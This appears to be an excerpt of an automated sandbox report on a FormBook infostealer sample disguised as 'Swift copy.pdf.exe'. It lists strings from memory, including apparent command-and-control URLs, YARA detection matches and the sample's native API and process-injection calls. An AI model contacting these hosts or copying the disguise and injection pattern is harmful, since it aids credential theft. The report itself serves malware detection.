          Source: Swift copy.pdf.exe, 00000000.00000002.356233417.0000000005730000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comltom4~g
          Source: Swift copy.pdf.exe, 00000000.00000002.356233417.0000000005730000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm
          Source: Swift copy.pdf.exe, 00000000.00000002.356233417.0000000005730000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.commH
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Swift copy.pdf.exe, 00000000.00000003.337103443.0000000005765000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/n
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Swift copy.pdf.exe, 00000000.00000003.337103443.0000000005765000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/z
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://www.indiafoodtraveling.com/px.js?ch=1
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://www.indiafoodtraveling.com/px.js?ch=2
          Source: cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpString found in binary or memory: http://www.indiafoodtraveling.com/sk-logabpstatus.php?a=OHpkUkI0Y0QxUWRjUnVBV284aHBwcjQ2RmVkZlhNYU5Y
          Source: Swift copy.pdf.exe, 00000000.00000003.331358786.0000000005738000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Swift copy.pdf.exe, 00000000.00000003.331358786.0000000005738000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Aq
          Source: Swift copy.pdf.exe, 00000000.00000003.331358786.0000000005738000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/o.H
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Swift copy.pdf.exe, 00000000.00000003.332090387.0000000005765000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: cscript.exe, 0000000A.00000002.591457906.00000000002C7000.00000004.00000020.sdmpString found in binary or memory: http://www.stepmed.life/ifne/?AjR=cNnBXpKXSwxtuHjKs6rP8ZpLsoLiQU1uQw7AksJLx/bmQGd
          Source: explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Swift copy.pdf.exe, 00000000.00000003.328467490.000000000574B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comF
          Source: Swift copy.pdf.exe, 00000000.00000003.331103187.0000000005735000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comS~
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnd&~u
          Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.n
          Source: Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cns
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Swift copy.pdf.exe
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D23BBC NtQueryInformationProcess,0_2_06D23BBC
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_004181B0 NtCreateFile,5_2_004181B0
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_00418260 NtReadFile,5_2_00418260
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_004182E0 NtClose,5_2_004182E0
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_00418390 NtAllocateVirtualMemory,5_2_00418390
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_004181AA NtCreateFile,5_2_004181AA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979840 NtDelayExecution,LdrInitializeThunk,10_2_04979840
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979860 NtQuerySystemInformation,LdrInitializeThunk,10_2_04979860
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049799A0 NtCreateSection,LdrInitializeThunk,10_2_049799A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049795D0 NtClose,LdrInitializeThunk,10_2_049795D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_04979910
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979540 NtReadFile,LdrInitializeThunk,10_2_04979540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049796D0 NtCreateKey,LdrInitializeThunk,10_2_049796D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049796E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_049796E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979A50 NtCreateFile,LdrInitializeThunk,10_2_04979A50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979650 NtQueryValueKey,LdrInitializeThunk,10_2_04979650
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_04979660
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979780 NtMapViewOfSection,LdrInitializeThunk,10_2_04979780
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979FE0 NtCreateMutant,LdrInitializeThunk,10_2_04979FE0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979710 NtQueryInformationToken,LdrInitializeThunk,10_2_04979710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049798A0 NtWriteVirtualMemory,10_2_049798A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049798F0 NtReadVirtualMemory,10_2_049798F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979820 NtEnumerateKey,10_2_04979820
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0497B040 NtSuspendThread,10_2_0497B040
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049799D0 NtCreateProcessEx,10_2_049799D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049795F0 NtQueryInformationFile,10_2_049795F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0497AD30 NtSetContextThread,10_2_0497AD30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979520 NtWaitForSingleObject,10_2_04979520
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979950 NtQueueApcThread,10_2_04979950
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979560 NtWriteFile,10_2_04979560
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979A80 NtOpenDirectoryObject,10_2_04979A80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979610 NtEnumerateValueKey,10_2_04979610
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979A10 NtQuerySection,10_2_04979A10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979A00 NtProtectVirtualMemory,10_2_04979A00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979A20 NtResumeThread,10_2_04979A20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979670 NtQueryInformationProcess,10_2_04979670
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0497A3B0 NtGetContextThread,10_2_0497A3B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049797A0 NtUnmapViewOfSection,10_2_049797A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0497A710 NtOpenProcessToken,10_2_0497A710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979B00 NtSetValueKey,10_2_04979B00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979730 NtQueryVirtualMemory,10_2_04979730
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979770 NtSetInformationFile,10_2_04979770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0497A770 NtOpenThread,10_2_0497A770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04979760 NtOpenProcess,10_2_04979760
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_03128390 NtAllocateVirtualMemory,10_2_03128390
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_03128260 NtReadFile,10_2_03128260
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_031282E0 NtClose,10_2_031282E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_031281B0 NtCreateFile,10_2_031281B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_031281AA NtCreateFile,10_2_031281AA
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_00D0C2B00_2_00D0C2B0
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_00D099680_2_00D09968
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_025800400_2_02580040
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_02583C680_2_02583C68
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_025800060_2_02580006
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_025836190_2_02583619
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_025838900_2_02583890
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_02586E480_2_02586E48
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_02583EFA0_2_02583EFA
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_02583E8B0_2_02583E8B
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_02580F6F0_2_02580F6F
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_02580F800_2_02580F80
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D2C4D00_2_06D2C4D0
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D2E5700_2_06D2E570
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D221A80_2_06D221A8
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D251400_2_06D25140
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D2DC780_2_06D2DC78
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D21DD80_2_06D21DD8
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D2FAC00_2_06D2FAC0
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D26A200_2_06D26A20
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D24B800_2_06D24B80
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D25B800_2_06D25B80
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D248A00_2_06D248A0
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D256130_2_06D25613
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D256200_2_06D25620
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D284700_2_06D28470
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D284600_2_06D28460
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D282780_2_06D28278
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D250F30_2_06D250F3
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D221A00_2_06D221A0
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D291130_2_06D29113
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D251330_2_06D25133
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_06D291200_2_06D29120
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 0_2_001C20500_2_001C2050
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 4_2_001120504_2_00112050
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_00408C505_2_00408C50
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_0041B4935_2_0041B493
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_0041C5855_2_0041C585
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_00402D885_2_00402D88
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_0041C5915_2_0041C591
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeCode function: 5_2_005020505_2_00502050
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494B09010_2_0494B090
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A020A810_2_04A020A8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049620A010_2_049620A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494841F10_2_0494841F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F100210_2_049F1002
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496258110_2_04962581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494D5E010_2_0494D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493F90010_2_0493F900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A02D0710_2_04A02D07
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04930D2010_2_04930D20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495412010_2_04954120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A01D5510_2_04A01D55
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A022AE10_2_04A022AE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A02EF710_2_04A02EF7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04956E3010_2_04956E30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496EBB010_2_0496EBB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A01FF110_2_04A01FF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A02B2810_2_04A02B28
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_03112FB010_2_03112FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_03112D9010_2_03112D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0312C59110_2_0312C591
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0312C58510_2_0312C585
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_03112D8810_2_03112D88
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_03118C5010_2_03118C50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0312B49310_2_0312B493
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0493B150 appears 35 times
          Source: Swift copy.pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Swift copy.pdf.exeBinary or memory string: OriginalFilename vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe, 00000000.00000002.349185865.00000000001C2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDefaultDecoder.exe> vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe, 00000000.00000002.362132971.0000000006F50000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll" vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe, 00000000.00000002.362079019.0000000006D30000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll2 vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exeBinary or memory string: OriginalFilename vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe, 00000004.00000002.347496434.0000000000112000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDefaultDecoder.exe> vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exeBinary or memory string: OriginalFilename vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe, 00000005.00000002.390364207.000000000131F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe, 00000005.00000002.389930422.0000000000FF0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exe, 00000005.00000002.389481115.0000000000502000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDefaultDecoder.exe> vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exeBinary or memory string: OriginalFilenameDefaultDecoder.exe> vs Swift copy.pdf.exe
          Source: Swift copy.pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
